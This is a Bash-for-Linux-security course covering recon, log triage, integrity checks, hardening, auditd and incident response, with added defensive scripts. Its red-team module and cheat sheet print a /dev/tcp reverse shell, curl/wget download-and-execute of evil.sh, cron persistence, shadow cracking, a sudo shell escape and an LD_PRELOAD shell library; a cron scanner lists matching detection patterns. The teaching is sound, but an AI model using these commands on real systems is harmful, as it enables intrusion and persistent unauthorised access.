Bash for Linux Security: Complete Course Notes

Master Bash to Secure, Audit, Exploit & Respond on Linux Systems


COURSE OVERVIEW

Target Audience: Linux Admins, Blue Teamers, Pentesters, DevSecOps, Red Teamers
Prerequisites: Kali/Ubuntu, Bash shell, basic Linux
Tools: Kali Linux, sudo, nano, tmux, Sysdig, Auditd
Ethical Use Only: Authorized systems only (labs, CTFs, enterprise with consent)


WHY BASH FOR LINUX SECURITY?

Feature              Security Advantage
Native               No install needed
Pipeline (|)         Chain tools: ps | grep | awk
Cron + Signals       Automation & persistence
File descriptors     Redirect logs, hide output
sudo + setuid        Privilege escalation paths
Auditd + Syscalls    Deep system monitoring

MODULE 1: BASH BASICS FOR SECURITY

Key Commands

# Recon
whoami; id; uname -a; lsb_release -a      # cat /etc/os-release where lsb_release is absent
pgrep -a ssh                              # ssh/sshd processes; pgrep never matches itself, so no "grep -v grep"
ss -tulnp                                 # listening TCP/UDP sockets with owning process (netstat is deprecated; ss replaces it)

# File Ops
find / -type f -perm -4000 2>/dev/null    # SUID binaries (-type f: directories can carry 4000 too and are noise)
ls -la /etc/shadow /etc/passwd            # shadow must never be world-readable; passwd is world-readable by design
grep -m1 "model name" /proc/cpuinfo

# Output
echo "[+] Found" >&2               # stderr: status messages stay visible when stdout is redirected to a file
printf "Scan complete\n"           # prefer printf over echo for data you do not control (no -e/-n surprises)

Hands-On: System Recon Script

#!/bin/bash
# recon.sh - quick host recon. exec+tee copies everything to the log, not just the banner
# (a lone "echo ... | tee" logs only that one line). No pipefail here: head closing the
# find pipe would turn find's SIGPIPE into a fatal error.
log="recon_$(date +%F).log"
exec > >(tee -a "$log") 2>&1

echo "=== Linux Recon ==="
echo "[*] Host: $(hostname)"
echo "[*] Kernel: $(uname -r)"
echo "[*] Uptime: $(uptime -p)"

echo "[*] Users with UID 0:"           # anything other than root here is a finding
awk -F: '$3 == 0 {print $1}' /etc/passwd

echo "[*] SUID Files:"
find / -type f -perm -4000 2>/dev/null | head -20

echo "[*] Listening Sockets:"          # -l already selects listeners; filtering on LISTEN would drop UDP (UNCONN)
ss -tulnp

Run: chmod +x recon.sh; sudo ./recon.sh


MODULE 2: SYSTEM AUDITING & FORENSICS

2.1 Log Analysis

# Failed logins per source IP. Do not rely on a fixed field ($11): "Failed password for invalid user X from IP"
# has two more fields than "Failed password for X from IP", so take the word after "from" instead.
grep "Failed password" /var/log/auth.log \
  | awk '{for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1)}' | sort | uniq -c | sort -nr

# SSH brute force via journald (required on hosts without rsyslog, where /var/log/auth.log does not exist)
journalctl _COMM=sshd | grep "Failed" | tail -20
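Below is an added example (not part of the original course notes) that turns the failed-login pipeline above into reusable functions and runs them over a constructed auth.log sample embedded in the script. The sample lines, the hostname web01 and the 203.0.113.x, 198.51.100.x and 192.0.2.x addresses are made up (RFC 5737 documentation ranges); the function names failed_by_ip and brute_force_sources are this example's own.

```bash
#!/usr/bin/env bash
# Failed-login triage over syslog-format sshd lines (auth.log or `journalctl _COMM=sshd`).
# Takes the word after "from" instead of a fixed field number, so both
# "Failed password for root from IP" and "Failed password for invalid user X from IP" are counted.

# Constructed sample lines for a stand-alone run; they are not from a real host.
SAMPLE_AUTH_LOG='Nov 10 08:01:02 web01 sshd[1201]: Failed password for root from 203.0.113.5 port 51022 ssh2
Nov 10 08:01:04 web01 sshd[1203]: Failed password for invalid user admin from 203.0.113.5 port 51030 ssh2
Nov 10 08:01:06 web01 sshd[1205]: Failed password for invalid user oracle from 203.0.113.5 port 51044 ssh2
Nov 10 08:02:10 web01 sshd[1210]: Accepted publickey for deploy from 198.51.100.7 port 40010 ssh2: ED25519 SHA256:x
Nov 10 08:03:15 web01 sshd[1220]: Failed password for deploy from 198.51.100.7 port 40022 ssh2
Nov 10 08:04:30 web01 sshd[1230]: Failed password for invalid user test from 192.0.2.9 port 33000 ssh2'

# failed_by_ip: stdin = log lines; stdout = "COUNT IP", highest count first.
failed_by_ip() {
    awk '/Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { print $(i + 1); break }
         }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# brute_force_sources THRESHOLD: stdin = log lines; stdout = IPs with at least THRESHOLD failures.
brute_force_sources() {
    failed_by_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# Stand-alone demo on the sample. On a live host replace the printf with
#   grep "Failed password" /var/log/auth.log     or     journalctl _COMM=sshd --no-pager
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_by_ip
printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 3
```

A threshold of 3 within the sample window singles out 203.0.113.5; in practice feed a bounded time range (journalctl --since) so the count is per window, not per lifetime of the log.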

2.2 File Integrity (Tripwire-like)

# Baseline (store it off-host or on read-only media: an attacker who can alter /etc can also alter a baseline left beside it)
find /etc -type f -exec sha256sum {} + > baseline.hash

# Verify: --quiet prints only files that FAIL or are missing. A plain hash list cannot reveal NEW files.
sha256sum -c --quiet baseline.hash
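Added example, not from the original page: a baseline/verify pair that goes one step past sha256sum -c by also reporting files that appeared after the baseline was taken. The function names fim_baseline and fim_verify, the status tags and the demo directory are this example's own; it runs on a throwaway temp tree so it can be tried without touching /etc.

```bash
#!/usr/bin/env bash
# Baseline/verify that reports three classes of change: MODIFIED (hash differs),
# MISSING (in baseline, gone from disk) and NEW (on disk, absent from baseline).
# sha256sum -c alone covers the first two; a file planted next to the originals goes unnoticed.

# fim_baseline DIR BASELINE: hash every regular file under DIR into BASELINE (sha256sum format).
fim_baseline() {
    find "$1" -type f -print0 | LC_ALL=C sort -z | xargs -0 -r sha256sum > "$2"
}

# fim_verify DIR BASELINE: print "STATUS path" per change; return 1 if anything changed, 0 if clean.
fim_verify() {
    _dir=$1; _base=$2; _rc=0
    # Walk the baseline: each line is "<hash>  <path>" (two spaces).
    while IFS= read -r _line; do
        _hash=${_line%% *}
        _path=${_line#*  }
        if [ ! -f "$_path" ]; then
            printf 'MISSING  %s\n' "$_path"; _rc=1
        elif [ "$(sha256sum "$_path" | cut -d' ' -f1)" != "$_hash" ]; then
            printf 'MODIFIED %s\n' "$_path"; _rc=1
        fi
    done < "$_base"
    # Files on disk whose path is not in the baseline at all (comm -13: lines only in the second list).
    _known=$(mktemp)
    awk '{ sub(/^[^ ]+  /, ""); print }' "$_base" | LC_ALL=C sort > "$_known"
    _new=$(find "$_dir" -type f | LC_ALL=C sort | comm -13 "$_known" -)
    rm -f "$_known"
    if [ -n "$_new" ]; then
        printf '%s\n' "$_new" | sed 's/^/NEW      /'; _rc=1
    fi
    return "$_rc"
}

# Stand-alone demo on a throwaway tree (constructed here). On a real host baseline /etc and keep the
# baseline off-box or read-only, since whoever can edit /etc can edit a baseline stored beside it.
demo=$(mktemp -d)
printf 'a=1\n' > "$demo/a.conf"; printf 'b=1\n' > "$demo/b.conf"
fim_baseline "$demo" "$demo.base"
printf 'b=EVIL\n' > "$demo/b.conf"        # modified
printf 'x\n' > "$demo/dropper.sh"         # new
fim_verify "$demo" "$demo.base" || echo "[!] integrity violations found"
rm -rf "$demo" "$demo.base"
```

Paths containing newlines are not handled (sha256sum escapes them); for /etc that is not a practical concern. The non-zero return value lets a cron wrapper alert only on change.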

2.3 Process & Network Monitoring

# Suspicious processes (pgrep -f matches the full command line and excludes itself, so the grep that
# searched for "miner" no longer shows up as its own hit)
pgrep -af 'stratum|miner'

# Real-time established connections (drop -l: it restricts ss to listening sockets, which are never ESTAB)
watch -n 1 "ss -tunp state established"

MODULE 3: USER & PERMISSION HARDENING

3.1 Find Weak Permissions

# World-writable files (-xdev stays on one filesystem; repeat for each mount point you care about)
find / -xdev -type f -perm -002 2>/dev/null

# Private SSH keys readable or writable by group/other (the .pub half is legitimately 644, so exclude it;
# "! -perm 600" would also flag a perfectly fine 400 key)
find / -xdev -type f -name "id_*" ! -name "*.pub" -perm /077 2>/dev/null
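Added example (not the page's code) that wraps the two checks above in one audit function and runs it over a constructed directory. The tags WORLD_WRITABLE, LOOSE_KEY and LOOSE_SSH_DIR and the function name perm_audit are this example's own; the -printf and -perm /077 forms are GNU find.

```bash
#!/usr/bin/env bash
# Weak-permission audit for a directory tree. Each finding is "TAG path"; returns 1 if any.
# The key check excludes *.pub on purpose: the public half is meant to be 644, the private half is not.

# perm_audit ROOT: print findings; return 1 if there are any, 0 otherwise.
perm_audit() {
    _root=$1
    _findings=$( {
        # World-writable regular files: anyone can plant code in them (scripts, cron targets, configs).
        find "$_root" -xdev -type f -perm -o+w -printf 'WORLD_WRITABLE %p\n'
        # Private SSH keys with any group/other bit set (ssh itself refuses to use keys like this).
        find "$_root" -xdev -type f -name 'id_*' ! -name '*.pub' -perm /077 -printf 'LOOSE_KEY %p\n'
        # .ssh directories that are not 700: authorized_keys inside becomes readable or writable by others.
        find "$_root" -xdev -type d -name '.ssh' -perm /077 -printf 'LOOSE_SSH_DIR %p\n'
    } 2>/dev/null )
    if [ -n "$_findings" ]; then
        printf '%s\n' "$_findings"
        return 1
    fi
    return 0
}

# Stand-alone demo on a constructed tree; on a real host run e.g.  perm_audit /home ; perm_audit /etc
demo=$(mktemp -d)
mkdir -m 700 "$demo/.ssh"
printf 'PRIVATE\n' > "$demo/.ssh/id_ed25519";     chmod 644 "$demo/.ssh/id_ed25519"      # too open
printf 'PUBLIC\n'  > "$demo/.ssh/id_ed25519.pub"; chmod 644 "$demo/.ssh/id_ed25519.pub"  # fine
printf '#!/bin/sh\n' > "$demo/backup.sh";         chmod 666 "$demo/backup.sh"            # world-writable
perm_audit "$demo" || echo "[!] weak permissions found"
rm -rf "$demo"
```

Run it as root over /home and /etc; the exit status makes it usable as a pre-deploy gate or a cron check.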

3.2 Password Auditing

# Offline crack with John (install: sudo apt install john). Reading /etc/shadow needs root;
# do this only on systems you are authorized to audit.
sudo unshadow /etc/passwd /etc/shadow > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt               # list the accounts that fell

3.3 Sudo Misconfigs

sudo -l 2>/dev/null | grep -E "NOPASSWD|\(ALL"     # what may this account run, and without a password?
# Exploit: an allowed editor or pager hands out a root shell, e.g. sudo vim → :!/bin/sh  (or: sudo vim -c ':!/bin/sh')

MODULE 4: NETWORK SECURITY & SCANNING

4.1 Port Scanner

#!/bin/bash
# tcp_scan.sh TARGET [LAST_PORT] - full-connect scan with bash's /dev/tcp, no nmap needed.
# It completes the TCP handshake, so the target logs every probe.
target=${1:?usage: $0 TARGET [LAST_PORT]}
last=${2:-1000}
for port in $(seq 1 "$last"); do
    # timeout keeps filtered (silently dropped) ports from hanging the loop
    timeout 1 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo "[+] $port OPEN"
done

4.2 Banner Grabbing

#!/bin/bash
# banner.sh TARGET. Port 22 sends its SSH banner before reading anything and 80 answers the HEAD
# request; 443 speaks TLS, so raw nc gets nothing there (use  openssl s_client -connect TARGET:443).
for port in 22 80 443; do
    printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -w 3 "$1" "$port"
done

4.3 iptables Firewall Rules

# List rules (on current distros the iptables binary is the iptables-nft shim; nft list ruleset shows the same rules)
iptables -L -n -v

# Allow only SSH inbound. Run from the console or a session you can afford to lose.
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT   # without this, replies to the host's own outbound traffic (DNS, apt) are dropped
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -j DROP
# Rules are lost on reboot unless saved (netfilter-persistent on Debian/Ubuntu, iptables-services on RHEL)

MODULE 5: EXPLOITATION & POST-EXPLOITATION (RED TEAM)

WARNING: Use only in authorized labs

5.1 Reverse Shell (One-Liner)

# Attacker: nc -lvnp 4444
# Victim:
bash -i >& /dev/tcp/192.168.1.10/4444 0>&1

5.2 Download & Execute

curl -s http://192.168.1.10/evil.sh | bash
# or
wget -qO- http://192.168.1.10/evil.sh | bash

5.3 Cron Persistence

# Add reverse shell every minute
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/192.168.1.10/4444 0>&1") | crontab -
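The defensive counterpart to the cron persistence one-liner above, added here and not part of the original notes: a scanner for crontab text that flags the reverse-shell, download-and-execute and encoded-command patterns this module uses, plus anything run out of /tmp, /var/tmp or /dev/shm. The sample crontab is constructed; the tag names and the function names scan_cron_text and scan_system_cron are this example's own, and the pattern list is a starting point rather than a complete indicator set.

```bash
#!/usr/bin/env bash
# Detect cron-based persistence: scan crontab text for reverse shells, download-and-execute pipes,
# base64-decoded commands and anything executed from a world-writable scratch directory.

# Constructed sample crontab (not from a real host): two benign jobs, four planted ones.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /opt/backup/run.sh
* * * * * bash -i >& /dev/tcp/192.168.1.10/4444 0>&1
@reboot /dev/shm/.x/agent
15 2 * * * curl -s http://192.168.1.10/u.sh | bash
30 1 * * * echo aGVsbG8= | base64 -d | sh'

# scan_cron_text: stdin = crontab lines; stdout = "TAG<TAB>line" for each suspicious entry.
# Comments and blank lines are dropped first; the first matching rule wins (next).
scan_cron_text() {
    grep -v '^[[:space:]]*#' | grep -E . | awk '
        /\/dev\/tcp\//                                           { print "REVERSE_SHELL\t" $0; next }
        /(^|[^a-z])(nc|ncat|netcat)[^|]* -e /                    { print "REVERSE_SHELL\t" $0; next }
        /(curl|wget)[^|]*\|[ \t]*(ba)?sh([ \t]|$)/                { print "DOWNLOAD_EXEC\t" $0; next }
        /base64[ \t]+(-d|--decode)[^|]*\|[ \t]*(ba)?sh([ \t]|$)/  { print "ENCODED_CMD\t" $0; next }
        /\/(tmp|var\/tmp|dev\/shm)\//                             { print "TMP_EXEC\t" $0; next }
    '
}

# scan_system_cron: run the scan over every system and per-user crontab (root needed for the spools).
# Debian keeps user crontabs in /var/spool/cron/crontabs/, RHEL directly in /var/spool/cron/.
scan_system_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        scan_cron_text < "$f" | sed "s|^|$f: |"
    done
}

# Stand-alone demo on the sample; on a live host call scan_system_cron instead.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_text
```

Pair it with an auditd watch on /etc/cron.d and /var/spool/cron so the moment of modification is logged as well as the content.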

MODULE 6: DEFENSIVE SCRIPTING & HARDENING

6.1 Enable Auditd

sudo apt install auditd
sudo systemctl enable --now auditd

# Monitor sudo execution. Put rules in /etc/audit/rules.d/: augenrules regenerates /etc/audit/audit.rules
# from that directory, so a rule appended straight to audit.rules is overwritten on the next load.
echo "-w /usr/bin/sudo -p x -k sudo" | sudo tee -a /etc/audit/rules.d/sudo.rules
sudo augenrules --load          # on Debian/Ubuntu the unit sets RefuseManualStop=yes, so "systemctl restart auditd" is refused
sudo auditctl -l                # confirm the rule is live
sudo ausearch -k sudo -i        # query the events by key
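Added example, not from the original page: a rules.d file that extends the single sudo watch above to the identity files, persistence locations and execve tracing a defender normally wants, plus a loader. The file name 50-linsec.rules, the key names and the function names are this example's own; it assumes the distro's base file in /etc/audit/rules.d/ already carries -D, -b and -f (Debian's and Ubuntu's default audit.rules does), so those are not repeated here.

```bash
#!/usr/bin/env bash
# Persistent auditd rule set, written to /etc/audit/rules.d/ and loaded with augenrules (the supported
# way; editing /etc/audit/audit.rules by hand is overwritten on reload).

# write_audit_rules [FILE]: write the rule set to FILE (default /etc/audit/rules.d/50-linsec.rules).
write_audit_rules() {
    cat > "${1:-/etc/audit/rules.d/50-linsec.rules}" <<'EOF'
## Identity and privilege files: writes and attribute changes
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
-w /etc/group -p wa -k identity
-w /etc/sudoers -p wa -k sudoers
-w /etc/sudoers.d/ -p wa -k sudoers
## Privilege escalation tools: log every execution
-w /usr/bin/sudo -p x -k priv_esc
-w /usr/bin/su -p x -k priv_esc
## Every execve by an interactive user (auid >= 1000; auid 4294967295 = unset, i.e. daemons), both ABIs
-a always,exit -F arch=b64 -S execve -F auid>=1000 -F auid!=4294967295 -k exec
-a always,exit -F arch=b32 -S execve -F auid>=1000 -F auid!=4294967295 -k exec
## Persistence locations
-w /etc/crontab -p wa -k cron
-w /etc/cron.d/ -p wa -k cron
-w /var/spool/cron/ -p wa -k cron
-w /etc/ld.so.preload -p wa -k ld_preload
-w /etc/ssh/sshd_config -p wa -k sshd
## The audit configuration itself
-w /etc/audit/ -p wa -k auditconfig
EOF
}

# audit_rule_count FILE: number of rule lines (-w/-a) in FILE, ignoring comments and blanks.
audit_rule_count() {
    grep -c '^-[aw] ' "$1"
}

# load_audit_rules: merge rules.d into audit.rules and load into the kernel (root only).
load_audit_rules() {
    augenrules --load && auditctl -l
}

# Stand-alone demo: render to a temp file and count the rules without touching the live system.
tmp=$(mktemp)
write_audit_rules "$tmp"
printf '%s rules written to %s\n' "$(audit_rule_count "$tmp")" "$tmp"
rm -f "$tmp"
# Live use (as root):  write_audit_rules && load_audit_rules   then   ausearch -k priv_esc -i
```

The two execve rules are the noisiest; on a busy build host raise -b in the base file or scope them with -F exe= before rolling out.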

6.2 AppArmor / SELinux

# Check status (only one applies: Debian/Ubuntu/SUSE ship AppArmor, RHEL/Fedora ship SELinux)
sudo aa-status          # lists loaded profiles and which are in complain vs enforce mode
sestatus

# Enforce one profile at a time. Do not glob /etc/apparmor.d/*: that directory also holds
# abstractions/, tunables/, local/ and disable/, which are not profiles and make the command fail.
sudo aa-enforce /etc/apparmor.d/<profile>

6.3 Fail2Ban Setup

sudo apt install fail2ban
# jail.local should hold only your overrides; copying jail.conf wholesale breaks on package upgrades.
# backend = systemd reads sshd from the journal, which is required where /var/log/auth.log does not exist.
printf '[sshd]\nenabled = true\nbackend = systemd\nmaxretry = 5\nbantime = 1h\n' | sudo tee /etc/fail2ban/jail.local
sudo systemctl enable --now fail2ban
sudo fail2ban-client status sshd      # confirms the jail is running and shows current bans

MODULE 7: AUTOMATION & TOOLING

7.1 Auto-Recon Framework

#!/bin/bash
# auto_recon.sh TARGET - chain nmap, nikto and gobuster; only against targets you are authorized to test
set -euo pipefail
target=${1:?usage: $0 TARGET}
out="recon/$target"
mkdir -p "$out"

# Full chain (nmap -A needs root for the SYN scan and OS detection)
sudo nmap -A -oX "$out/nmap.xml" "$target"
nikto -h "$target" -output "$out/nikto.txt"
gobuster dir -u "http://$target" -w /usr/share/wordlists/dirb/common.txt -o "$out/gobuster.txt"

echo "Recon saved to $out"

7.2 Incident Response Playbook

#!/bin/bash
# ir_playbook.sh - collect volatile data, most volatile first; run as root.
# Do not write to /tmp: it is world-writable and often where the intruder is working. Use a dedicated
# directory (ideally on external media) that only root can read.
casedir="/var/tmp/IR_$(date +%F_%H%M)"
mkdir -m 700 "$casedir"

# Collect volatile data
date -u > "$casedir/collected_at.txt"
ss -tunap > "$casedir/sockets.txt"            # every TCP/UDP socket, not just listeners
ps -eo pid,ppid,user,lstart,cmd > "$casedir/ps.txt"
who > "$casedir/who.txt"
last -n 50 > "$casedir/last.txt"
dmesg > "$casedir/dmesg.txt"
sha256sum "$casedir"/* > "$casedir/MANIFEST.sha256"   # chain of custody for everything collected

echo "IR Data in $casedir"

MODULE 8: ADVANCED TOPICS

8.1 Linux Capabilities

getcap -r / 2>/dev/null
# cap_net_raw on ping is the expected default and is not an escalation path on its own. The findings are
# unusual holders of cap_setuid, cap_dac_read_search, cap_dac_override or cap_sys_admin: an interpreter
# such as python or perl carrying cap_setuid=ep can setuid(0) and hand out a root shell directly.

8.2 LD_PRELOAD Rootkit (Conceptual)

// malicious.c - a constructor runs before the host program's main()
#include <stdlib.h>
__attribute__((constructor)) void init(void) {
    system("/bin/sh");
}
# Compile: gcc -shared -fPIC -o malicious.so malicious.c
# Run:     LD_PRELOAD=./malicious.so /bin/ls
# Limits:  the dynamic loader ignores LD_PRELOAD paths for setuid/setgid programs (secure-execution mode)
#          and sudo's env_reset drops the variable, so this hooks the current user's processes only and is
#          not privilege escalation. The root-only persistent variant is /etc/ld.so.preload, which is why
#          that file belongs on every integrity and audit watch list.

8.3 eBPF Monitoring (Modern)

# Install bcc-tools (the *-bpfcc tools are Python front-ends to the kernel's eBPF tracing hooks; they need root)
sudo apt install bpfcc-tools
# Trace every open() system-wide and keep the lines touching passwd/shadow. If lines arrive only in
# bursts, Python is block-buffering into the pipe: prefix with  env PYTHONUNBUFFERED=1
sudo opensnoop-bpfcc | grep --line-buffered -E 'passwd|shadow'

CAPSTONE PROJECT: LINUX SECURITY TOOLKIT

#!/bin/bash
# linsec_toolkit.sh - menu front-end for the module scripts in ./modules/
cd "$(dirname "$0")" || exit 1     # module paths are relative to this script, not to the caller's cwd
show_menu() {
    clear
    echo "=== Linux Security Toolkit ==="
    echo "1. System Recon"
    echo "2. Audit Logs"
    echo "3. Port Scan"
    echo "4. Harden System"
    echo "5. Exit"
}

while true; do
    show_menu
    read -rp "Choose: " choice
    case "$choice" in
        1) ./modules/recon.sh ;;
        2) ./modules/audit.sh ;;
        3) read -rp "Target: " target; ./modules/scan.sh "$target" ;;
        4) ./modules/harden.sh ;;
        5) exit 0 ;;
        *) echo "Invalid choice: $choice" ;;
    esac
    read -rp "Press Enter to continue..." _
done

RESOURCES & PRACTICE

Platform        Focus
TryHackMe       "Linux Fundamentals", "Bash Scripting"
Hack The Box    Linux machines
OverTheWire     Bandit (Bash challenges)
Root-Me         Shellcoding, privilege escalation
Pwnable.kr      Linux exploitation

CHEAT SHEET (One-Page)

# Recon
id; uname -a; cat /etc/os-release
find / -type f -perm -4000 2>/dev/null

# Logs
journalctl, dmesg, /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL)
grep "Failed" /var/log/secure

# Network
ss -tulnp, ss -tunp state established, nc -z, curl -I
iptables -L -n -v

# Defense
auditctl -w /etc/passwd -p wa -k identity     # live until reboot; persist it in /etc/audit/rules.d/
aa-enforce /etc/apparmor.d/<profile>          # one profile at a time, never the whole directory

# Red Team
bash -i >& /dev/tcp/IP/PORT 0>&1
(crontab -l; echo "* * * * * /bin/sh -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'") | crontab -

FINAL TIPS

  1. Enable Auditd + Sysdig for full visibility
  2. Use set -euo pipefail in scripts
  3. Never run untrusted scripts as root
  4. Monitor /tmp, /dev/shm, cron jobs
  5. Practice in Labs: Metasploitable2, VulnHub


Stay Ethical. Stay Rooted. Secure Linux.

Last updated: Nov 10, 2025
